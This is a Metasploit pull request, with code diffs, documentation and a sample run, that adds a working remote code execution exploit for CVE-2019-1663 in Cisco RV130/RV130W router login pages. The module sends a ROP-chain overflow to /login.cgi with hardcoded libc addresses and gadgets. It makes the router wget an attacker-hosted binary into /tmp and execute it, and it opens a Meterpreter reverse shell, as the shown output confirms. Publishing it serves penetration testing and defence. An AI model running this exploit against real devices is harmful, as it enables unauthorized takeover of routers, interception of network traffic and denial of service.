### PR TITLE
Exploit for CVE-2019-1663 on Cisco RV130(W).

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
@@ -19,9 +19,9 @@ firmware here: https://software.cisco.com/download/home/285026141/type/282465789
 
 1. Start msfconsole
 2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
-4. ```set rhost [IP]```
-5. ```set payload linux/armle/meterpreter_reverse_tcp```
-6. ```set lhost [IP]```
-7. ```exploit```
-8. You should get a session
+3. ```set rhost [IP]```
+4. ```set payload linux/armle/meterpreter_reverse_tcp```
+5. ```set lhost [IP]```
+6. ```exploit```
+7. You should get a session
 

--- a/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
+++ b/documentation/modules/exploit/linux/http/cisco_rv130_rmi_rce.md
@@ -1,0 +1,27 @@
+# Cisco RV130W Routers Management Interface Remote Command Execution
+
+A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+system of the affected device as a high-privilege user.
+
+## Vulnerable Device
+
+* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+This exploit was specifically written against version 1.0.3.28. To test, you can find the
+firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28
+
+## Verification Steps
+
+1. Start msfconsole
+2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
+4. ```set rhost [IP]```
+5. ```set payload linux/armle/meterpreter_reverse_tcp```
+6. ```set lhost [IP]```
+7. ```exploit```
+8. You should get a session
+

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -65,17 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
        },
       'Targets'        =>
         [
-          [ 'Cisco RV130 < 1.0.3.45',
-            {
-              'offset'          => 446,
-              'libc_base_addr'  => 0x357fb000,
-              'system_offset'   => 0x0004d144,
-              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
-              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
-              'Arch'            => ARCH_ARMLE,
-            }
-          ],
-          [ 'Cisco RV130W < 1.0.3.45',
+          [ 'Cisco RV130/RV130W < 1.0.3.45',
             {
               'offset'          => 446,
               'libc_base_addr'  => 0x357fb000,

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -14,7 +14,7 @@
 # linux/armle/shell_reverse_tcp -> segfault
 #
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = GoodRanking
 
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::CmdStager
@@ -88,7 +88,11 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         ],
       'DisclosureDate'  => 'Feb 27 2019',
-      'DefaultTarget'   => 0))
+      'DefaultTarget'   => 0,
+      'Notes' => {
+        'Stability'   => [ CRASH_SERVICE_DOWN, ],
+      },
+    ))
   end
 
   def p (offset)

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -47,7 +47,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'         => MSF_LICENSE,
       'Platform'        =>  %w[linux],
       'Arch'            =>  [ARCH_ARMLE],
-      'Stance'          => Msf::Exploit::Stance::Aggressive,
       'SessionTypes'    =>  %w[meterpreter],
       'CmdStagerFlavor' => %w{ wget },
       'Privileged'      => true, # BusyBox

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -36,9 +36,9 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Yu Zhang <>', # Initial discovery
-          'Haoliang Lu <>', # Initial discovery
-          'T. Shiomitsu <>', # Initial discovery
+          'Yu Zhang', # Initial discovery
+          'Haoliang Lu', # Initial discovery
+          'T. Shiomitsu', # Initial discovery
           'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
         ],
       'License'         => MSF_LICENSE,

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -33,6 +33,9 @@ class MetasploitModule < Msf::Exploit::Remote
           system of the affected device as a high-privilege user.
 
         RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+
+        Note: successful exploitation may not result in a session, and as such,
+         on_new_session will never repair the HTTP server, leading to a denial-of-service condition.
       },
       'Author'         =>
         [
@@ -44,8 +47,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'         => MSF_LICENSE,
       'Platform'        =>  %w[linux],
       'Arch'            =>  [ARCH_ARMLE],
+      'Stance'          => Msf::Exploit::Stance::Aggressive,
       'SessionTypes'    =>  %w[meterpreter],
-      'CmdStagerFlavor'=> %w{ wget },
+      'CmdStagerFlavor' => %w{ wget },
       'Privileged'      => true, # BusyBox
       'References'      =>
         [

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -1,0 +1,177 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# linux/armle/meterpreter/bind_tcp -> segfault
+# linux/armle/meterpreter/reverse_tcp -> segfault
+# linux/armle/meterpreter_reverse_http -> works
+# linux/armle/meterpreter_reverse_https -> works
+# linux/armle/meterpreter_reverse_tcp -> works
+# linux/armle/shell/bind_tcp -> segfault
+# linux/armle/shell/reverse_tcp -> segfault
+# linux/armle/shell_bind_tcp -> segfault
+# linux/armle/shell_reverse_tcp -> segfault
+#
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Cisco RV130W Routers Management Interface Remote Command Execution',
+      'Description'    => %q{
+        A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router
+         could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.
+
+         The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
+         An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
+
+         A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
+          system of the affected device as a high-privilege user.
+
+        RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.
+      },
+      'Author'         =>
+        [
+          'Yu Zhang <>', # Initial discovery
+          'Haoliang Lu <>', # Initial discovery
+          'T. Shiomitsu <>', # Initial discovery
+          'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev
+        ],
+      'License'         => MSF_LICENSE,
+      'Platform'        =>  %w[linux],
+      'Arch'            =>  [ARCH_ARMLE],
+      'SessionTypes'    =>  %w[meterpreter],
+      'Privileged'      => true, # BusyBox
+      'References'      =>
+        [
+          ['CVE', '2019-1663'],
+          ['CISCO-SA', '20190227'],
+          ['BID', '107185'],
+          ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
+        ],
+      'DefaultOptions' => {
+          'WfsDelay' => 10,
+          'SSL' => true,
+          'RPORT' => 443,
+          'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
+       },
+      'Targets'        =>
+        [
+          [ 'Cisco RV130 < 1.0.3.45',
+            {
+              'offset'          => 446,
+              'libc_base_addr'  => 0x357fb000,
+              'system_offset'   => 0x0004d144,
+              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
+              'Arch'            => ARCH_ARMLE,
+            }
+          ],
+          [ 'Cisco RV130W < 1.0.3.45',
+            {
+              'offset'          => 446,
+              'libc_base_addr'  => 0x357fb000,
+              'system_offset'   => 0x0004d144,
+              'gadget1'         => 0x00020e79, # pop {r2, r6, pc};
+              'gadget2'         => 0x00041308, # mov r0, sp; blx r2;
+              'Arch'            => ARCH_ARMLE,
+            }
+          ],
+        ],
+      'DisclosureDate'  => 'Feb 27 2019',
+      'DefaultTarget'   => 0))
+  end
+
+  def p (offset)
+    [(target['libc_base_addr'] + offset).to_s(16)].pack('H*').reverse
+  end
+
+  def prepare_shellcode(cmd)
+    #All these gadgets are from /lib/libc.so.0
+    shellcode = rand_text_alpha(target['offset']) +       # filler
+      p(target['gadget1']) +
+      p(target['system_offset']) +                        # r2
+      rand_text_alpha(4) +                                # r6
+      p(target['gadget2']) +                              # pc
+      cmd
+    shellcode
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    #print_status("on_request_uri called: #{request.inspect}")
+    if (not @pl)
+      print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{peer} - Sending the payload to the device...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  def send_request (payload)
+    begin
+      send_request_cgi({
+        'uri'     => '/login.cgi',
+        'method'  => 'POST',
+        'vars_post' => {
+              "submit_button": "login",
+              "submit_type": "",
+              "gui_action": "",
+              "wait_time": 0,
+              "change_action": "",
+              "enc": 1,
+              "user": "cisco",
+              "pwd": payload,
+              "sel_lang": "EN"
+          }
+      })
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router")
+    end
+  end
+
+  def exploit
+    print_status("#{peer} - Attempting to exploit #{target.name}")
+    downfile = rand_text_alpha(8+rand(8))
+    @pl = generate_payload_exe
+    @elf_sent = false
+    resource_uri = '/' + downfile
+
+    #do not use SSL
+    if datastore['SSL']
+      ssl_restore = true
+      datastore['SSL'] = false
+    end
+
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = Rex::Socket.source_address(rhost)
+    else
+      srv_host = datastore['SRVHOST']
+    end
+
+    service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+    print_status("#{peer} - Starting up our web service on #{service_url} ...")
+    start_service({'Uri' => {
+      'Proc' => Proc.new { |cli, req|
+        on_request_uri(cli, req)
+      },
+      'Path' => resource_uri
+    }})
+
+    datastore['SSL'] = true if ssl_restore
+    print_status("#{peer} - Asking the device to download and execute #{service_url}")
+
+    filename = rand_text_alpha_lower(rand(8) + 2)
+    cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
+
+    shellcode = prepare_shellcode(cmd)
+    send_request(shellcode)
+  end
+end

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -50,7 +50,6 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'      =>
         [
           ['CVE', '2019-1663'],
-          ['CISCO-SA', '20190227'],
           ['BID', '107185'],
           ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],
         ],

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -134,4 +134,20 @@ class MetasploitModule < Msf::Exploit::Remote
     shellcode = prepare_shellcode(cmd.to_s)
     send_request(shellcode)
   end
+
+  def on_new_session(session)
+    # Given there is no process continuation here, the httpd server will stop
+    # functioning properly and we need to take care of proper restart
+    # ourselves.
+    print_status("Reloading httpd service")
+    reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S"
+    if session.type.to_s.eql? 'meterpreter'
+      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
+      session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\""
+    else
+      session.shell_command(reload_httpd_service)
+    end
+  ensure
+    super
+  end
 end

--- a/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
+++ b/modules/exploits/linux/http/cisco_rv130_rmi_rce.rb
@@ -17,9 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
-  include Msf::Exploit::EXE
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -47,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'        =>  %w[linux],
       'Arch'            =>  [ARCH_ARMLE],
       'SessionTypes'    =>  %w[meterpreter],
+      'CmdStagerFlavor'=> %w{ wget },
       'Privileged'      => true, # BusyBox
       'References'      =>
         [
@@ -59,6 +58,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'WfsDelay' => 10,
           'SSL' => true,
           'RPORT' => 443,
+          'CMDSTAGER::FLAVOR' => 'wget',
           'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',
        },
       'Targets'        =>
@@ -103,18 +103,6 @@ class MetasploitModule < Msf::Exploit::Remote
     shellcode
   end
 
-  # Handle incoming requests from the server
-  def on_request_uri(cli, request)
-    #print_status("on_request_uri called: #{request.inspect}")
-    if (not @pl)
-      print_error("#{peer} - A request came in, but the payload wasn't ready yet!")
-      return
-    end
-    print_status("#{peer} - Sending the payload to the device...")
-    @elf_sent = true
-    send_response(cli, @pl)
-  end
-
   def send_request (payload)
     begin
       send_request_cgi({
@@ -138,40 +126,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("#{peer} - Attempting to exploit #{target.name}")
-    downfile = rand_text_alpha(8+rand(8))
-    @pl = generate_payload_exe
-    @elf_sent = false
-    resource_uri = '/' + downfile
+    print_status('Sending request')
+    execute_cmdstager
+  end
 
-    #do not use SSL
-    if datastore['SSL']
-      ssl_restore = true
-      datastore['SSL'] = false
-    end
-
-    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-      srv_host = Rex::Socket.source_address(rhost)
-    else
-      srv_host = datastore['SRVHOST']
-    end
-
-    service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-    print_status("#{peer} - Starting up our web service on #{service_url} ...")
-    start_service({'Uri' => {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
-      'Path' => resource_uri
-    }})
-
-    datastore['SSL'] = true if ssl_restore
-    print_status("#{peer} - Asking the device to download and execute #{service_url}")
-
-    filename = rand_text_alpha_lower(rand(8) + 2)
-    cmd = "wget #{service_url} -O /tmp/#{filename}; chmod +x /tmp/#{filename}; /tmp/#{filename} &"
-
-    shellcode = prepare_shellcode(cmd)
+  def execute_command(cmd, opts = {})
+    shellcode = prepare_shellcode(cmd.to_s)
     send_request(shellcode)
   end
 end


### PR DESCRIPTION
# Cisco RV130(W) Routers Management Interface Remote Command Execution

A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.

The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.

A successful exploit could allow the attacker to execute arbitrary code on the underlying operating
system of the affected device as a high-privilege user.

## Vulnerable Device

* RV130 Multifunction VPN Router versions prior to 1.0.3.45 are affected.
* RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.

This exploit was specifically written against version 1.0.3.28. To test, you can find the
firmware here: https://software.cisco.com/download/home/285026141/type/282465789/release/1.0.3.28

## Verification Steps

1. Start msfconsole
2. ```use exploit/linux/http/cisco_rv130_rmi_rce```
3. ```set rhost [IP]```
4. ```set payload linux/armle/meterpreter_reverse_tcp```
5. ```set lhost [IP]```
6. ```exploit```
7. You should get a session

Sample run:

```
msf5 exploit(linux/http/cisco_rv130_rmi_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending request
[*] Using URL: http://192.168.1.100:8080/FiGVSQDm60T
[*] Client 192.168.1.1 (Wget) requested /FiGVSQDm60T
[*] Sending payload to 192.168.1.1 (Wget)
[*] Meterpreter session 7 opened (192.168.1.100:4444 -> 192.168.1.1:45947) at 2019-03-22 20:33:48 +0100
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.1.1
OS           :  (Linux 2.6.31.1-cavm1)
Architecture : armv6l
BuildTuple   : armv5l-linux-musleabi
Meterpreter  : armle/linux
```


## TODO

Confirm offsets for the following firmware versions:

- [x] 1.0.3.44
- [x] 1.0.3.28
- [x] 1.0.3.22
- [x] 1.0.3.16
- [x] 1.0.3.14
- [x] 1.0.2.7
- [x] 1.0.1.3
- [x] 1.0.0.21


